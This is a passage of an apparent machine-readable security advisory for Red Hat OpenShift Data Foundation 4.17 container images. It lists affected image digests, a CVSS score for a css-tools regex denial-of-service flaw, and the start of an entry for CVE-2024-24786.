"9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5.3, baseSeverity: "MEDIUM", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", version: "3.1", }, products: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:7c59771279f5227246a941925160ca2f9fc169bd13972ab68a476e62308707e1_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:99d8b3aedcc57f57716bba144b991f7f223cdcc47ec37903c85aa20df295b3d4_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:12e2b71cea2c63fb14363334287f5affa4ff3dc84f24dd51b5f57ba6a751c2da_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:322bae96941ede565a681ad98fc287f442f36888e0ed2b5ec4b309c702c7488b_amd64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64", "9Base-RHODF-4.17:odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:3342a17a1afca419dbfbff815261e91cdf8dcf0eecaf5a25a1713a39f3f95bf4_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:baf554d45b1fb4b38b264145809c10c7733120104bc4d8bd9e1ecb0c428db382_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-operator-bundle@sha256:c05b5597918214f845c7243b7407b6cc3c88f644eec504585bd411727376b898_amd64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b_ppc64le", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "css-tools: Improper Input Validation causes Denial of Service via Regular Expression", }, { cve: "CVE-2024-24786", cwe: { id: "CWE-835", name: "Loop with Unreachable Exit Condition ('Infinite Loop')", }, discovery_date: "2024-03-06T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", 